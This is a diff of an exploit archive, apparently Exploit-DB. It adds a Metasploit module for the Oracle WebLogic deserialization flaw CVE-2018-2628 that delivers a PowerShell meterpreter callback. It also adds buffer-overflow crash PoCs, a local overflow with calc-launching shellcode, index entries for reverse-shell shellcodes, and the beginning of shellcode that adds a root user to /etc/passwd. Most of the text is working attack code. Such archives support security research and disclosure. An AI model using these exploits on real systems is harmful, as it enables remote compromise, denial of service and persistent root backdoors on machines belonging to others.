+      'Author' =>
+        [
+        'brianwrf',     # EDB PoC
+        'Jacob Robles'  # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2018-2628'],
+          ['EDB', '44553']
+        ],
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => ['win']
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'RPORT' => 7001
+        },
+      'DisclosureDate' => 'Apr 17 2018'))
+  end
+
+  def gen_resp
+    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
+    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+
+    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
+    mycmd << tmp_dat
+
+    # Response data taken from JRMPListener generated data:
+    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
+    # Modified captured network traffic bytes. Patch in command to run
+    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
+    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
+    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
+    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
+    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
+    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
+    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
+    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
+    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
+    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
+    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
+    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
+    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
+    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
+    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
+    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
+    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
+    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
+    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
+    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
+    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
+    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
+    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
+    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
+    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
+    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
+    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
+    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
+    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
+    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
+    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
+    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
+    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
+    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
+    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
+    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
+    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
+    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
+    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
+    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
+    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
+    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
+    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
+    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
+    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
+    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
+    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
+    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
+    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
+    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
+    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
+    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
+    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
+    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
+    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
+    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
+    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
+    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
+    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
+    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
+    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
+    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
+    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
+    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
+    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
+    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
+    @resp << '673badd256e7e91d7b470200007078700000000174'
+
+    @resp << mycmd
+
+    @resp << '74'
+    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
+    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
+    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
+    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
+    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
+    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
+    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
+    @resp << '7e005a'
+  end
+
+
+  def on_client_connect(client)
+    # Make sure to only sent one meterpreter payload to a host.
+    # During testing the remote host called back up to 11 times
+    # (or as long as the server was listening).
+    vprint_status("Comparing host: #{client.peerhost}")
+    if @met_sent.include?(client.peerhost) then return end
+    @met_sent << client.peerhost
+
+    vprint_status("met_sent: #{@met_sent}")
+
+    # Response format determined by watching network traffic
+    # generated by EDB PoC
+    accept_conn = '4e00'
+    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
+    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
+    accept_conn << raccept_conn
+    accept_conn << '0000'
+    accept_conn << client.peerport.to_s(16).rjust(4,'0')
+
+    client.put([accept_conn].pack('H*'))
+    client.put([@resp].pack('H*'))
+  end
+
+  def t3_handshake
+    shake = '74332031322e322e310a41533a323535'
+    shake << '0a484c3a31390a4d533a313030303030'
+    shake << '30300a0a'
+
+    sock.put([shake].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def build_t3_request_object
+    # data block is from EDB PoC
+    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
+    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
+    data << '700000000a000000030000000000000006007070707070700000000a00000003'
+    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
+    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
+    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
+    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
+    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
+    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
+    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
+    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
+    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
+    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
+    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
+    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
+    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
+    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
+    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
+    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
+    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
+    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
+    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
+    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
+    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
+    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
+    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
+    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
+    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
+    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
+    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
+    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
+    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
+    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
+    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
+    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
+    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
+    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
+    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
+    data << '2d4147444d565155423154362e656883348cd6000000070000'
+
+    data << rport.to_s(16).rjust(4, '0')
+
+    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
+    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
+    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
+    data << '863d1d0000000078'
+
+    sock.put([data].pack('H*'))
+    sleep(2)
+    sock.get_once
+  end
+
+  def send_payload_objdata
+    # JRMPClient2 payload generated from EDB PoC:
+    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
+    # Patch in srvhost and srvport
+    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
+    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
+    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
+    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
+    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
+    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
+    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
+    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
+    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
+    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
+    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
+    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
+    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
+    payload << '78707702000078fe010000'
+
+    # Data
+    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
+    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
+    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
+    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
+    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
+    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
+    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
+    payload << '1e030000787077'
+
+    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
+    unicast_dat = '000a556e696361737452656600'
+    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
+    unicast_dat << unicast_srvhost
+    unicast_dat << '0000'
+    unicast_dat << srvport.to_s(16).rjust(4,'0')
+    unicast_dat << '000000004e18654b000000000000000000000000000000'
+    unicast_dat << '78'
+
+    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
+    payload << unicast_dat
+
+    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
+    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
+    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
+    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
+    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
+    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
+    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
+    payload << '6f3b290000001b7878fe00ff'
+
+    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
+    data << payload
+
+    sock.put([data].pack('H*'))
+    sleep(1)
+    sock.put([data].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def exploit
+    @met_sent = []
+    gen_resp
+
+    connect
+    vprint_status('Sending handshake...')
+    t3_handshake
+
+    build_t3_request_object
+
+    start_service
+
+    vprint_status('Sending payload...')
+    send_payload_objdata
+
+    # Need to wait this long to make sure we get a shell back
+    sleep(10)
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45182.py b/exploits/windows_x86/dos/45182.py
new file mode 100755
index 000000000..f8fed7e22
--- /dev/null
+++ b/exploits/windows_x86/dos/45182.py
@@ -0,0 +1,25 @@
+# Exploit Title: IP Finder 1.5 - Denial of Service (PoC)  
+# Author: Shubham Singh
+# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
+# Discovey Date: 2018-08-12
+# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder
+# Tested Version: 1.5
+# Tested on OS: Windows XP Service Pack 3 x86
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the Search&Config Tool program paste the content of 
+# "exploit.txt" in password field. You will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 1500
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45191.py b/exploits/windows_x86/dos/45191.py
new file mode 100755
index 000000000..d54c34168
--- /dev/null
+++ b/exploits/windows_x86/dos/45191.py
@@ -0,0 +1,23 @@
+# Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)  
+# Discovery by: Shubham Singh
+# Known As: Spirited Wolf [Twitter: @Pwsecspirit] 
+# Discovey Date: 2018-08-13
+# Vendor Homepage: https://switchportmapper.com/
+# Software Link: https://switchportmapper.com/download/spm2812.zip
+# Tested Version: 2.81.2
+# Tested on OS: Windows 7 Ultimate x86_64
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name
+# "exploit.txt". Just copy the text inside "exploit.txt" and start the 
+# Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key".
+# In the 'Name field' paste the content of "exploit.txt" and click 
+# on "OK". You will see a crash.
+
+#!/usr/bin/env python
+
+file = open("exploit.txt","wb")
+junk = "A" * 3000
+exploit = junk
+buf = exploit
+file.write(buf)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45181.py b/exploits/windows_x86/local/45181.py
new file mode 100755
index 000000000..90b8c8a70
--- /dev/null
+++ b/exploits/windows_x86/local/45181.py
@@ -0,0 +1,54 @@
+# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow  
+# Author: Shubham Singh
+# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
+# Discovey Date: 2018-08-12
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Tested on OS: Windows XP Service Pack 3 x86
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name 
+# "exploit.txt" just copy the text inside "exploit.txt" and start the 
+# iSmartViewPro 1.5 program and click on "System Setup" in the 
+# "Save Path for Snapshot and Record file" field. Paste the content of 
+# "exploit.txt" and click on Save. You will see a sweet calculator poped up.
+# Greetz:  @FuzzySec @LiveOverflow @hexachordanu @HansSecurity
+
+#!/usr/bin/python
+   
+buffer = "A" * 272
+#0x6a192c79 : call ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [avcodec-54.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\iSmartViewPro\avcodec-54.dll)
+
+eip = "\x79\x2C\x19\x6A"
+nops = "\x90" *12
+#badchar \x00\x0a\x0d
+#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d' -f python
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (600 - len(eip) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + eip + nops + buf + pad
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f81659b97..8f3aebe11 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6041,6 +6041,10 @@ id,file,description,date,author,type,platform,port
 45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80
 45162,exploits/windows_x86-64/dos/45162.py,"QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)",2018-08-07,"Rodrigo Eduardo Rodriguez",dos,windows_x86-64,
 45174,exploits/multiple/dos/45174.py,"reSIProcate 1.10.2 - Heap Overflow",2018-08-09,"Joachim De Zutter",dos,multiple,5061
+45182,exploits/windows_x86/dos/45182.py,"IP Finder 1.5 - Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
+45186,exploits/windows/dos/45186.py,"Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)",2018-08-13,"Javier Enrique Rodriguez Gutierrez",dos,windows,
+45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
+45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9864,6 +9868,9 @@ id,file,description,date,author,type,platform,port
 45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 45175,exploits/linux/local/45175.c,"Linux Kernel  4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
 45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
+45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
+45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
+45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16676,7 +16683,9 @@ id,file,description,date,author,type,platform,port
 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
 45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
+45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
+45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39778,8 +39787,9 @@ id,file,description,date,author,type,platform,port
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
 45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
 45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
-45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
+45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
 45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
 45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
 45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
+45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 30c9c51b0..f9a628d2e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -900,3 +900,4 @@ id,file,description,date,author,type,platform
 45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
 45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
 45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
+45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/45185.asm b/shellcodes/linux_x86-64/45185.asm
new file mode 100644
index 000000000..9f54df3a1
--- /dev/null
+++ b/shellcodes/linux_x86-64/45185.asm
@@ -0,0 +1,93 @@
+; Title: add root user (toor:toor) 
+; Date: 20180811
+; Author: epi <epibar052@gmail.com>
+;   https://epi052.gitlab.io/notes-to-self/
+; Tested on: linux/x86_64 (SMP CentOS-7 3.10.0-862.2.3.el7.x86_64 GNU/Linux)
+; 
+; Shellcode Length: 99 bytes
+; Action: Adds a user into /etc/passwd with the following information
+;           username:   toor
+;           password:   toor
+;           uid:        0
+;           gid:        0
+;           home:       /root
+;           shell:      /bin/sh
+;
+;           toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh
+  
+global _start
+
+section .text
+_start:
+    ; #define __NR_open 2
+    ; int open(const char *pathname, int flags);
+    ; rax -> 2 
+    ; rdi -> /etc/passwd
+    ; rsi -> 0x401
+    ; 
+    ; >>> hex(os.O_WRONLY ^ os.O_APPEND)
+    ; 0x401
+    xor ebx, ebx
+    mul ebx                         ; rax|rdx -> 0x0
+    push rax 
